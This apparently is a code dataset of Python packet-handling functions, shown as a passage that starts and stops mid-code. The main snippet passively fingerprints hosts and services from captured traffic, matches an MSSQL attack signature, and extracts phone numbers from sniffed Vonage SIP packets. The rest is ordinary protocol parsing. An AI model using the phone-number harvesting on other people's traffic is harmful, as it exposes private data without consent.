\"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif (Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == \"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def packet_from_bytes(data: bytes) -> Packet:\n packet = PacketBase.from_buffer_copy(data)\n struct = packet.struct_type()\n if len(data) != struct.SIZE:\n raise racetools.errors.PacketSizeMismatch(struct.SIZE, len(data))\n return struct.from_buffer_copy(data)", "def struct_type(self) -> typing.Type[Packet]:\n for packet_type in (\n TelemetryData,\n RaceData,\n ParticipantsData,\n TimingsData,\n GameStateData,\n TimeStatsData):\n if self.packet_type == packet_type.TYPE and self.packet_version == packet_type.VERSION:\n return packet_type\n if self.packet_type == ParticipantVehicleNamesData.TYPE:\n if self.partial_packet_index == self.partial_packet_number:\n packet_type = VehicleClassNamesData\n else:\n packet_type = ParticipantVehicleNamesData\n if self.packet_version == packet_type.VERSION:\n return packet_type\n raise racetools.errors.UnrecognisedPacketType(self.packet_type, self.packet_version)", "def makePacket(bytes):\n header = makePacketHeader(bytes[0:8])\n md5 = bytes[8:24]\n data = bytes[24:24 + header.length]\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! (expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def translate_control_packet(self, multicast_packet):", "def createPacket(id):\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n header = getHeaderData(0, id)\n\n data = 192 * 'Q'\n\n checksum = getChecksum(header + data)\n\n header = getHeaderData(socket.htons(checksum), id)\n\n return header + data", "def packet_to_kml(packet, reader):\n\n try:\n src_ip = packet[IP].src\n src_kml = ip_to_kml(src_ip, reader)\n except:\n src_kml = None\n try:\n dest_ip = packet[IP].dest\n dest_kml = ip_to_kml(dest_ip, reader)\n except:\n dest_kml = None\n\n if src_kml is not None and dest_kml is not None:\n connect_kml = ips_to_line_kml(src_ip, dest_ip, reader)\n print(\"Added connection\")\n else:\n connect_kml = None\n\n return src_kml, dest_kml, connect_kml", "def extract_packet(_buffer):\n if len(_buffer)>=5:\n mtype=_buffer[0]\n msglen=struct.unpack('!L',_buffer[1:5])[0]\n if len(_buffer)>=msglen+1:\n return _buffer[5:msglen+1],mtype,_buffer[msglen+1:]\n return None,None,_buffer", "def _convert_dta(self, old_type):\n if old_type not in (Dta115,):\n msg = \"\".join(\n (\"conversion from {} \".format(old_type.__name__),\n \"to Dta117 not supported\"))\n raise TypeError(msg)\n self._ds_format = 117\n self._typlist = [i if i <= 244 else 65530 + (251 - i) \n for i in self._typlist]", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def roughCook(self):\n\n # Set packet time\n cstSec = self.sec + RoughPacket.CST\n pktDate = time.strftime(\"%Y-%m-%d %H:%M:%S \", time.gmtime(cstSec))\n pktUsec = str(self.usec)[:3]\n self.pktTime = pktDate + pktUsec\n\n # Set packet length\n self.pktLen = len(self.pktData)\n\n # ----------\n # Link layer\n # ----------\n prototype, *_ = struct.unpack('!H', self.pktData[12:14])\n self.pktProt = RoughPacket.EtherMapUpper.get(prototype, 'Unknow')\n if self.pktProt == 'IP':\n srcIp, dstIp = struct.unpack('!4s 4s', self.pktData[26:34])\n self.pktSrc = getIpv4(srcIp)\n self.pktDst = getIpv4(dstIp)\n elif self.pktProt in ('IPv6', 'HOPOPT', 'IPv6-ICMP'):\n srcIpv6, dstIpv6 = struct.unpack('!16s 16s', self.pktData[22:54])\n self.pktSrc = getIpv6(srcIpv6)\n self.pktDst = getIpv6(dstIpv6)\n # elif self.pktProt in ('ARP', 'RARP', 'PPPoE-D', 'PPPoE-S'):\n else:\n dstMac, srcMac = struct.unpack('!6s 6s', self.pktData[:12])\n self.pktDst = getMacAddr(dstMac)\n self.pktSrc = getMacAddr(srcMac)\n\n self.appendProt(self.pktProt)\n\n # -------------\n # Network layer\n # -------------\n # IP protocol continue analysis upper protocol\n if self.pktProt == 'IP':\n self.ipHeaderLen = (self.pktData[14] & 15) * 4\n ipProt = int(self.pktData[23])\n self.pktProt = RoughPacket.IPMapUpper.get(ipProt, 'Unknow')\n\n # IPv6 protocol continue analysis upper protocol\n elif self.pktProt == 'IPv6':\n ipv6Prot = self.pktData[20]\n self.ipHeaderLen = 40\n self.pktProt = RoughPacket.IPMapUpper.get(ipv6Prot, 'Unknow')\n\n elif self.pktProt == 'PPPoE-S':\n pppProt = int(self.pktData[20:22].hex(), base=16)\n if pppProt == 0x0021:\n ipProt = int(self.pktData[31])\n self.pktProt = RoughPacket.IPMapUpper.get(ipProt, 'Unknow')\n self.ipHeaderLen = 20\n self.pppExtendLen = 8\n\n self.appendProt(self.pktProt)\n\n # ---------------\n # Transport layer\n # ---------------\n # UDP/TCP protocol continue analysis application protocol\n headerLen = self.ethHeaderLen + self.ipHeaderLen + self.pppExtendLen\n if self.pktProt == 'UDP':\n # 14 --> Ethernet, ipHeaderLen, 2 --> source port\n rawSrcPort = (self.pktData[headerLen + 0: headerLen + 2])\n srcPort, *_ = struct.unpack('!H', rawSrcPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(srcPort,\n 'UDP')\n if self.pktProt == 'UDP':\n rawDstPort = (self.pktData[headerLen + 2: headerLen + 4])\n dstPort, *_ = struct.unpack('!H', rawDstPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(dstPort,\n 'UDP')\n self.appendProt(self.pktProt)\n\n if self.pktProt == 'TCP':\n # 14 --> Ethernet, ipHeaderLen, 2 --> source port\n rawSrcPort = (self.pktData[headerLen + 0: headerLen + 2])\n srcPort, *_ = struct.unpack('!H', rawSrcPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(srcPort, 'TCP')\n if self.pktProt == 'TCP':\n rawDstPort = (self.pktData[headerLen + 2: headerLen + 4])\n dstPort, *_ = struct.unpack('!H', rawDstPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(dstPort,\n 'TCP')\n self.appendProt(self.pktProt)\n self.pktColor = RoughPacket.ProtColorMap.get(self.pktProt,\n QtGui.QColor(224, 224, 224,\n 255))\n\n # Generate package stack string\n stack = ''\n for prot in self.pktProtStack:\n decorProt = '[<< ' + prot + ' '\n stack = stack + decorProt\n self.pktStack = stack + len(self.pktProtStack) * '>>]'", "def _decode_next_layer(self, dict_, length=None):\n # make next layer protocol name\n proto = str(self._prot or 'Raw').lower()\n\n # make BytesIO from frame package data\n bytes_ = io.BytesIO(self._file.read(dict_['len']))\n info, protochain = self._import_next_layer(bytes_, length)\n\n # write info and protocol chain into dict\n self._protos = ProtoChain(self._prot, protochain)\n dict_[proto] = info\n dict_['protocols'] = self._protos.chain\n return dict_", "def packetDump(packet):\n hex = ''\n start = 0\n size = 16\n ln = len(packet)\n while start < ln:\n # print line number\n line = '%04x ' % start\n #print hex representation\n c = 0\n asc = packet[start:min(start+size, ln)]\n for b in asc:\n if c == 8:\n line = line + ' '\n line = line + '%02x ' % ord(b)\n c = c + 1\n line = ljust(line, 58) + '\"'\n # print ascii representation, replace unprintable characters with spaces\n for i in range(len(asc)):\n if ord(asc[i])<32 or ord(asc[i]) == 209:\n asc = replace(asc, asc[i], ' ')\n line = line + asc + '\"\\n' \n hex = hex + line\n start = start + size\n return hex.rstrip('\\n'), ln", "def get_link_type(comp_a, comp_b, link_type):\n need_to_verify = isinstance(comp_a, SpecialMixerComponent) or isinstance(comp_b, SpecialMixerComponent)\n if need_to_verify and link_type is not LinkType.horizontal:\n link_type = LinkType.matched_track_only\n return link_type", "def shortest_forwarding(self, msg, eth_type, ip_src, ip_dst):\r\n\r\n pkt = packet.Packet(msg.data)\r\n icmp_pkt = pkt.get_protocol(icmp.icmp)\r\n if icmp_pkt:\r\n ip_protocol = 1\r\n print 'icmp processing!'\r\n self.icmp_forwarding(msg, ip_protocol, eth_type, ip_src, ip_dst)\r\n return\r\n datapath = msg.datapath\r\n in_port = msg.match['in_port']\r\n tcp_pkt = None\r\n udp_pkt = None\r\n dst_port = self.awareness.get_host_location(ip_dst)[1]\r\n tcp_pkt = pkt.get_protocol(tcp.tcp)\r\n udp_pkt = pkt.get_protocol(udp.udp)\r\n L4_port = None\r\n flow_info = None\r\n flow_info_reverse = None\r\n\r\n # if not icmp packet,Get ip_proto and L4 port number.\r\n result = self.get_sw(datapath.id, in_port, ip_src, ip_dst) # result = (src_sw, dst_sw)\r\n if (result):\r\n src_sw, dst_sw = result[0], result[1]\r\n if setting.enable_Flow_Entry_L4Port:\r\n ip_proto, L4_port, Flag = self.get_L4_info(tcp_pkt, udp_pkt)\r\n if result:\r\n if dst_sw:\r\n src_sw, dst_sw = result[0], result[1]\r\n if ip_proto and L4_port and Flag:\r\n if ip_proto == 6:\r\n L4_Proto = 'TCP'\r\n elif ip_proto == 17:\r\n L4_Proto = 'UDP'\r\n else:\r\n pass\r\n L4_port.reverse()\r\n flow_info = (eth_type, ip_src, ip_dst, in_port, ip_proto, Flag, L4_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port, ip_proto, Flag, L4_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n info = (ip_src, ip_dst, ip_proto, L4_port[0], L4_port[1])\r\n info2 = (ip_dst, ip_src, ip_proto, L4_port[1], L4_port[0])\r\n if (info in self.register) and (info2 in self.register):\r\n return\r\n self.register.append(info)\r\n self.register.append(info2)\r\n # dst_host and src_host link one same switch\r\n if self.newComingFlows['src'].has_key(ip_src):\r\n self.newComingFlows['src'][ip_src] += 1\r\n else:\r\n self.newComingFlows['src'][ip_src] = 1\r\n if self.newComingFlows['dst'].has_key(ip_dst):\r\n self.newComingFlows['dst'][ip_dst] += 1\r\n else:\r\n self.newComingFlows['dst'][ip_dst] = 1\r\n flowDemand = self._bandwidth_demand(ip_src, ip_dst)\r\n if src_sw == dst_sw:\r\n self.send_packet_out(datapath, msg.buffer_id, in_port, dst_port, msg.data)\r\n else:\r\n if not (str(src_sw).startswith('3') and str(dst_sw).startswith('3')):\r\n return\r\n paths = self.awareness.shortest_paths.get(src_sw).get(dst_sw)\r\n self.graph = self.monitor.graph\r\n path = self._select_paths1(flowDemand, paths)\r\n\r\n # path = self.get_path(src_sw, dst_sw, weight=self.weight)\r\n # Path has already been calculated, just get it.\r\n if path == None:\r\n return\r\n path.reverse()\r\n try:\r\n # bucket=self.swToSegments(path)\r\n # self.Segment_forwarding(flow_info,bucket)\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info_reverse, msg.buffer_id,\r\n ip_dst, ip_src, msg.data)\r\n path.reverse()\r\n if len(flow_info_reverse) == 7:\r\n L4_port.reverse()\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info, msg.buffer_id, ip_src,\r\n ip_dst, msg.data)\r\n # self.compute_runing_time()\r\n\r\n except:\r\n self.flood(msg)", "def packet_from_xml_packet(xml_pkt, psml_structure=None):\n if not isinstance(xml_pkt, lxml.objectify.ObjectifiedElement):\n parser = lxml.objectify.makeparser(huge_tree=True, recover=True)\n try:\n xml_pkt = lxml.objectify.fromstring(xml_pkt, parser)\n except lxml.etree.XMLSyntaxError:\n res = re.findall(r'<field name=\"num\" pos=\"0\" show=\"(.*?)\"', xml_pkt.decode(), re.S)[0]\n print(f'Packet conversion error from xml to python object for packet number {res}.')\n return\n if psml_structure:\n return _packet_from_psml_packet(xml_pkt, psml_structure)\n return _packet_object_from_xml(xml_pkt)", "def ethernet_frame(packet):\n dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', packet[:14])\n return get_mac_addr(dest_mac), get_mac_addr(src_mac), socket.htons(proto), packet[14:]", "def decode_packet(data):\n\n opcodes = [(\"AUTH_LOGON_CHALLENGE\", \"\\x00\"), (\"AUTH_LOGON_PROOF\", \"\\x01\")]\n opcode = data[0] # Opcode of the received packet (First byte)\n if opcode == opcodes[0][1]: # Auth Logon challenge\n srp_rcvd = {\n 'error': data[1], # (you should hope that it is always 0)\n 'B': data[3:35], # Read B and skip 1 field (Length_g)\n 'g': data[36:37], # Read g and skip 1 field (Length_n)\n 'N': data[38:70],\n 's': data[70:102], # Read salt\n 'crc': data[102:] # (useless for private servers)\n }\n return srp_rcvd\n if opcode == opcodes[1][1]:\n # Auth logon proof\n if data[1] == \"\\x00\": # Code error: 0\n srp_rcvd = {'login': 1}\n else:\n srp_rcvd = 